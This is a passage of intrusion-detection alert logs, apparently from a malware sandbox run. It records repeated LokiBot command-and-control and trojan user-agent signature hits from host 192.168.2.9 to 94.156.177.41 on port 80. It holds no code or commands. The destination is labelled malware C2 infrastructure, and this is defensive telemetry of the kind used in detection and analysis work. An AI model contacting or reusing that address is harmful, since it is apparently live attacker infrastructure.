2025-01-10T23:39:40.887725+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49848	94.156.177.41	80	TCP
2025-01-10T23:39:41.794660+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49856	94.156.177.41	80	TCP
2025-01-10T23:39:42.649680+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49864	94.156.177.41	80	TCP
2025-01-10T23:39:43.541295+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49870	94.156.177.41	80	TCP
2025-01-10T23:39:44.408571+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49876	94.156.177.41	80	TCP
2025-01-10T23:39:45.290090+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49881	94.156.177.41	80	TCP
2025-01-10T23:39:46.179028+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49886	94.156.177.41	80	TCP
2025-01-10T23:39:47.050321+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49892	94.156.177.41	80	TCP
2025-01-10T23:39:47.937644+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49901	94.156.177.41	80	TCP
2025-01-10T23:39:48.806843+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49908	94.156.177.41	80	TCP
2025-01-10T23:39:49.665813+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49914	94.156.177.41	80	TCP
2025-01-10T23:39:50.575157+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49920	94.156.177.41	80	TCP
2025-01-10T23:39:51.444692+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49926	94.156.177.41	80	TCP
2025-01-10T23:39:52.338312+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49933	94.156.177.41	80	TCP
2025-01-10T23:39:53.218160+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49940	94.156.177.41	80	TCP
2025-01-10T23:39:54.086668+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49948	94.156.177.41	80	TCP
2025-01-10T23:39:55.025052+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49954	94.156.177.41	80	TCP
2025-01-10T23:39:55.955134+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49960	94.156.177.41	80	TCP
2025-01-10T23:39:56.995565+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49967	94.156.177.41	80	TCP
2025-01-10T23:39:57.897849+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49975	94.156.177.41	80	TCP
2025-01-10T23:39:58.785828+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49981	94.156.177.41	80	TCP
2025-01-10T23:39:59.648286+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49988	94.156.177.41	80	TCP
2025-01-10T23:40:00.553250+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49993	94.156.177.41	80	TCP
2025-01-10T23:40:01.422154+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49998	94.156.177.41	80	TCP
2025-01-10T23:40:02.303573+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50004	94.156.177.41	80	TCP
2025-01-10T23:40:03.179106+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50011	94.156.177.41	80	TCP
2025-01-10T23:40:04.057722+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50016	94.156.177.41	80	TCP
2025-01-10T23:40:04.934937+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50017	94.156.177.41	80	TCP
2025-01-10T23:40:05.820286+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50018	94.156.177.41	80	TCP
2025-01-10T23:40:06.677767+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50019	94.156.177.41	80	TCP
2025-01-10T23:40:07.584598+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50020	94.156.177.41	80	TCP
2025-01-10T23:40:08.487826+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50021	94.156.177.41	80	TCP
2025-01-10T23:40:09.332798+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50022	94.156.177.41	80	TCP
2025-01-10T23:40:10.187709+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50023	94.156.177.41	80	TCP
2025-01-10T23:40:11.084858+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50024	94.156.177.41	80	TCP
2025-01-10T23:40:11.967895+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50025	94.156.177.41	80	TCP
2025-01-10T23:40:12.828046+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50026	94.156.177.41	80	TCP
2025-01-10T23:40:13.727441+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50027	94.156.177.41	80	TCP
2025-01-10T23:40:14.585926+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50028	94.156.177.41	80	TCP
2025-01-10T23:40:15.480507+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50029	94.156.177.41	80	TCP
2025-01-10T23:40:16.344537+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50030	94.156.177.41	80	TCP
2025-01-10T23:40:17.241026+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50031	94.156.177.41	80	TCP
2025-01-10T23:40:18.254524+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50033	94.156.177.41	80	TCP
2025-01-10T23:40:19.174821+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50034	94.156.177.41	80	TCP
2025-01-10T23:40:20.066732+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50035	94.156.177.41	80	TCP
2025-01-10T23:40:21.045311+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50036	94.156.177.41	80	TCP
2025-01-10T23:40:21.955338+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50037	94.156.177.41	80	TCP
2025-01-10T23:40:22.833111+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50038	94.156.177.41	80	TCP
2025-01-10T23:40:23.751820+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50039	94.156.177.41	80	TCP
2025-01-10T23:40:24.799360+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50040	94.156.177.41	80	TCP
2025-01-10T23:40:25.745524+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50041	94.156.177.41	80	TCP
2025-01-10T23:40:26.637887+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50042	94.156.177.41	80	TCP
2025-01-10T23:40:27.986716+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50043	94.156.177.41	80	TCP
2025-01-10T23:40:29.071409+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50044	94.156.177.41	80	TCP
2025-01-10T23:40:29.972876+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50045	94.156.177.41	80	TCP
2025-01-10T23:40:30.832317+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50046	94.156.177.41	80	TCP
2025-01-10T23:40:31.733241+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50047	94.156.177.41	80	TCP
2025-01-10T23:40:32.606354+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50048	94.156.177.41	80	TCP
2025-01-10T23:40:33.445790+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50049	94.156.177.41	80	TCP
2025-01-10T23:40:34.369359+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50050	94.156.177.41	80	TCP
2025-01-10T23:40:35.253709+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50051	94.156.177.41	80	TCP
2025-01-10T23:40:36.154474+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50052	94.156.177.41	80	TCP
2025-01-10T23:40:37.040945+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50053	94.156.177.41	80	TCP
2025-01-10T23:40:37.887352+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50054	94.156.177.41	80	TCP
2025-01-10T23:40:38.783876+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50055	94.156.177.41	80	TCP
2025-01-10T23:40:39.680469+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50056	94.156.177.41	80	TCP
2025-01-10T23:40:40.580294+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50057	94.156.177.41	80	TCP
2025-01-10T23:40:41.452593+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50058	94.156.177.41	80	TCP
2025-01-10T23:40:42.341481+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50059	94.156.177.41	80	TCP
2025-01-10T23:40:43.231137+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50060	94.156.177.41	80	TCP
2025-01-10T23:40:44.110314+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50061	94.156.177.41	80	TCP
2025-01-10T23:40:44.984978+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50062	94.156.177.41	80	TCP
2025-01-10T23:40:46.211611+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50063	94.156.177.41	80	TCP
2025-01-10T23:40:47.089896+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50064	94.156.177.41	80	TCP
2025-01-10T23:40:47.998043+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50065	94.156.177.41	80	TCP
2025-01-10T23:40:49.004508+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50066	94.156.177.41	80	TCP
2025-01-10T23:40:49.868094+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50067	94.156.177.41	80	TCP
2025-01-10T23:40:50.722392+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50068	94.156.177.41	80	TCP
2025-01-10T23:40:51.592376+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50069	94.156.177.41	80	TCP
2025-01-10T23:40:52.429020+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50070	94.156.177.41	80	TCP
2025-01-10T23:40:53.287063+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50071	94.156.177.41	80	TCP
2025-01-10T23:40:54.256299+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50072	94.156.177.41	80	TCP
2025-01-10T23:40:55.149707+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50073	94.156.177.41	80	TCP
2025-01-10T23:40:56.057969+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50074	94.156.177.41	80	TCP
2025-01-10T23:40:56.939599+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50075	94.156.177.41	80	TCP
2025-01-10T23:40:57.853599+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50076	94.156.177.41	80	TCP
2025-01-10T23:40:58.781456+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50077	94.156.177.41	80	TCP
2025-01-10T23:40:59.653370+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50078	94.156.177.41	80	TCP
2025-01-10T23:41:00.555619+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50079	94.156.177.41	80	TCP
2025-01-10T23:41:01.439251+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50080	94.156.177.41	80	TCP
2025-01-10T23:41:02.325275+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50081	94.156.177.41	80	TCP
2025-01-10T23:41:02.816240+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50082	94.156.177.41	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:39:32.526294+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49789	94.156.177.41	80	TCP
2025-01-10T23:39:33.496857+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49795	94.156.177.41	80	TCP
2025-01-10T23:39:34.373550+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49802	94.156.177.41	80	TCP
2025-01-10T23:39:35.278795+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49808	94.156.177.41	80	TCP
2025-01-10T23:39:36.347969+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49814	94.156.177.41	80	TCP
2025-01-10T23:39:37.275030+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49824	94.156.177.41	80	TCP
2025-01-10T23:39:38.209511+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49829	94.156.177.41	80	TCP
2025-01-10T23:39:39.065651+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49836	94.156.177.41	80	TCP
2025-01-10T23:39:39.984096+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49842	94.156.177.41	80	TCP
2025-01-10T23:39:40.887725+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49848	94.156.177.41	80	TCP
2025-01-10T23:39:41.794660+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49856	94.156.177.41	80	TCP
2025-01-10T23:39:42.649680+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49864	94.156.177.41	80	TCP
2025-01-10T23:39:43.541295+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49870	94.156.177.41	80	TCP
2025-01-10T23:39:44.408571+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49876	94.156.177.41	80	TCP
2025-01-10T23:39:45.290090+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49881	94.156.177.41	80	TCP
2025-01-10T23:39:46.179028+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49886	94.156.177.41	80	TCP
2025-01-10T23:39:47.050321+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49892	94.156.177.41	80	TCP
2025-01-10T23:39:47.937644+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49901	94.156.177.41	80	TCP
2025-01-10T23:39:48.806843+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49908	94.156.177.41	80	TCP
2025-01-10T23:39:49.665813+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49914	94.156.177.41	80	TCP
2025-01-10T23:39:50.575157+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49920	94.156.177.41	80	TCP
2025-01-10T23:39:51.444692+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49926	94.156.177.41	80	TCP
2025-01-10T23:39:52.338312+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49933	94.156.177.41	80	TCP
2025-01-10T23:39:53.218160+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49940	94.156.177.41	80	TCP
2025-01-10T23:39:54.086668+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49948	94.156.177.41	80	TCP
2025-01-10T23:39:55.025052+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49954	94.156.177.41	80	TCP
2025-01-10T23:39:55.955134+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49960	94.156.177.41	80	TCP
2025-01-10T23:39:56.995565+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49967	94.156.177.41	80	TCP
2025-01-10T23:39:57.897849+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49975	94.156.177.41	80	TCP
2025-01-10T23:39:58.785828+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49981	94.156.177.41	80	TCP
2025-01-10T23:39:59.648286+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49988	94.156.177.41	80	TCP
2025-01-10T23:40:00.553250+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49993	94.156.177.41	80	TCP
2025-01-10T23:40:01.422154+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	49998	94.156.177.41	80	TCP
2025-01-10T23:40:02.303573+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50004	94.156.177.41	80	TCP
2025-01-10T23:40:03.179106+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50011	94.156.177.41	80	TCP
2025-01-10T23:40:04.057722+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50016	94.156.177.41	80	TCP
2025-01-10T23:40:04.934937+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50017	94.156.177.41	80	TCP
2025-01-10T23:40:05.820286+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50018	94.156.177.41	80	TCP
2025-01-10T23:40:06.677767+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50019	94.156.177.41	80	TCP
2025-01-10T23:40:07.584598+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50020	94.156.177.41	80	TCP
2025-01-10T23:40:08.487826+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50021	94.156.177.41	80	TCP
2025-01-10T23:40:09.332798+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50022	94.156.177.41	80	TCP
2025-01-10T23:40:10.187709+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50023	94.156.177.41	80	TCP
2025-01-10T23:40:11.084858+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50024	94.156.177.41	80	TCP
2025-01-10T23:40:11.967895+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50025	94.156.177.41	80	TCP
2025-01-10T23:40:12.828046+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50026	94.156.177.41	80	TCP
2025-01-10T23:40:13.727441+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50027	94.156.177.41	80	TCP
2025-01-10T23:40:14.585926+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50028	94.156.177.41	80	TCP
2025-01-10T23:40:15.480507+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50029	94.156.177.41	80	TCP
2025-01-10T23:40:16.344537+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50030	94.156.177.41	80	TCP
2025-01-10T23:40:17.241026+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50031	94.156.177.41	80	TCP
2025-01-10T23:40:18.254524+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50033	94.156.177.41	80	TCP
2025-01-10T23:40:19.174821+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50034	94.156.177.41	80	TCP
2025-01-10T23:40:20.066732+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50035	94.156.177.41	80	TCP
2025-01-10T23:40:21.045311+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50036	94.156.177.41	80	TCP
2025-01-10T23:40:21.955338+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50037	94.156.177.41	80	TCP
2025-01-10T23:40:22.833111+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50038	94.156.177.41	80	TCP
2025-01-10T23:40:23.751820+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50039	94.156.177.41	80	TCP
2025-01-10T23:40:24.799360+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50040	94.156.177.41	80	TCP
2025-01-10T23:40:25.745524+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50041	94.156.177.41	80	TCP
2025-01-10T23:40:26.637887+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50042	94.156.177.41	80	TCP
2025-01-10T23:40:27.986716+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50043	94.156.177.41	80	TCP
2025-01-10T23:40:29.071409+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50044	94.156.177.41	80	TCP
2025-01-10T23:40:29.972876+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50045	94.156.177.41	80	TCP
2025-01-10T23:40:30.832317+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50046	94.156.177.41	80	TCP
2025-01-10T23:40:31.733241+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50047	94.156.177.41	80	TCP
2025-01-10T23:40:32.606354+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50048	94.156.177.41	80	TCP
2025-01-10T23:40:33.445790+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50049	94.156.177.41	80	TCP
2025-01-10T23:40:34.369359+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50050	94.156.177.41	80	TCP
2025-01-10T23:40:35.253709+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50051	94.156.177.41	80	TCP
2025-01-10T23:40:36.154474+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50052	94.156.177.41	80	TCP
2025-01-10T23:40:37.040945+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50053	94.156.177.41	80	TCP
2025-01-10T23:40:37.887352+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50054	94.156.177.41	80	TCP
2025-01-10T23:40:38.783876+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50055	94.156.177.41	80	TCP
2025-01-10T23:40:39.680469+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50056	94.156.177.41	80	TCP
2025-01-10T23:40:40.580294+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50057	94.156.177.41	80	TCP
2025-01-10T23:40:41.452593+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50058	94.156.177.41	80	TCP
2025-01-10T23:40:42.341481+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50059	94.156.177.41	80	TCP
2025-01-10T23:40:43.231137+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50060	94.156.177.41	80	TCP
2025-01-10T23:40:44.110314+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50061	94.156.177.41	80	TCP
2025-01-10T23:40:44.984978+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50062	94.156.177.41	80	TCP
2025-01-10T23:40:46.211611+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50063	94.156.177.41	80	TCP
2025-01-10T23:40:47.089896+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50064	94.156.177.41	80	TCP
2025-01-10T23:40:47.998043+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50065	94.156.177.41	80	TCP
2025-01-10T23:40:49.004508+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50066	94.156.177.41	80	TCP
2025-01-10T23:40:49.868094+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50067	94.156.177.41	80	TCP
2025-01-10T23:40:50.722392+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50068	94.156.177.41	80	TCP
2025-01-10T23:40:51.592376+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50069	94.156.177.41	80	TCP
2025-01-10T23:40:52.429020+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50070	94.156.177.41	80	TCP
2025-01-10T23:40:53.287063+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50071	94.156.177.41	80	TCP
2025-01-10T23:40:54.256299+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50072	94.156.177.41	80	TCP
2025-01-10T23:40:55.149707+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50073	94.156.177.41	80	TCP
2025-01-10T23:40:56.057969+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50074	94.156.177.41	80	TCP
2025-01-10T23:40:56.939599+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50075	94.156.177.41	80	TCP
2025-01-10T23:40:57.853599+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50076	94.156.177.41	80	TCP
2025-01-10T23:40:58.781456+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50077	94.156.177.41	80	TCP
2025-01-10T23:40:59.653370+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50078	94.156.177.41	80	TCP
2025-01-10T23:41:00.555619+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50079	94.156.177.41	80	TCP
2025-01-10T23:41:01.439251+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50080	94.156.177.41	80	TCP
2025-01-10T23:41:02.325275+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50081	94.156.177.41	80	TCP
2025-01-10T23:41:02.816240+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.9	50082	94.156.177.41	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:39:30.033217+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49775	94.156.177.41	80	TCP
2025-01-10T23:39:30.983574+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49782	94.156.177.41	80	TCP
2025-01-10T23:39:31.786336+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49789	94.156.177.41	80	TCP
2025-01-10T23:39:32.762986+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49795	94.156.177.41	80	TCP
2025-01-10T23:39:33.668904+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49802	94.156.177.41	80	TCP
2025-01-10T23:39:34.550687+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49808	94.156.177.41	80	TCP
2025-01-10T23:39:35.593982+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49814	94.156.177.41	80	TCP
2025-01-10T23:39:36.524977+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49824	94.156.177.41	80	TCP
2025-01-10T23:39:37.475403+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49829	94.156.177.41	80	TCP
2025-01-10T23:39:38.368872+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49836	94.156.177.41	80	TCP
2025-01-10T23:39:39.255080+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49842	94.156.177.41	80	TCP
2025-01-10T23:39:40.181219+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49848	94.156.177.41	80	TCP
2025-01-10T23:39:41.043838+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49856	94.156.177.41	80	TCP
2025-01-10T23:39:41.946366+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49864	94.156.177.41	80	TCP
2025-01-10T23:39:42.804638+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49870	94.156.177.41	80	TCP
2025-01-10T23:39:43.700209+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49876	94.156.177.41	80	TCP
2025-01-10T23:39:44.571656+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49881	94.156.177.41	80	TCP
2025-01-10T23:39:45.467959+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49886	94.156.177.41	80	TCP
2025-01-10T23:39:46.347914+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49892	94.156.177.41	80	TCP
2025-01-10T23:39:47.224865+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49901	94.156.177.41	80	TCP
2025-01-10T23:39:48.085557+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49908	94.156.177.41	80	TCP
2025-01-10T23:39:48.966901+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49914	94.156.177.41	80	TCP
2025-01-10T23:39:49.857189+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49920	94.156.177.41	80	TCP
2025-01-10T23:39:50.736564+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49926	94.156.177.41	80	TCP
2025-01-10T23:39:51.608218+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49933	94.156.177.41	80	TCP
2025-01-10T23:39:52.498581+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49940	94.156.177.41	80	TCP
2025-01-10T23:39:53.373246+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49948	94.156.177.41	80	TCP
2025-01-10T23:39:54.280518+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49954	94.156.177.41	80	TCP
2025-01-10T23:39:55.188309+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49960	94.156.177.41	80	TCP
2025-01-10T23:39:56.120922+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49967	94.156.177.41	80	TCP
2025-01-10T23:39:57.148898+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49975	94.156.177.41	80	TCP
2025-01-10T23:39:58.061788+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49981	94.156.177.41	80	TCP
2025-01-10T23:39:58.942881+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49988	94.156.177.41	80	TCP
2025-01-10T23:39:59.805268+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49993	94.156.177.41	80	TCP
2025-01-10T23:40:00.712172+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49998	94.156.177.41	80	TCP
2025-01-10T23:40:01.567820+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50004	94.156.177.41	80	TCP
2025-01-10T23:40:02.475547+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50011	94.156.177.41	80	TCP
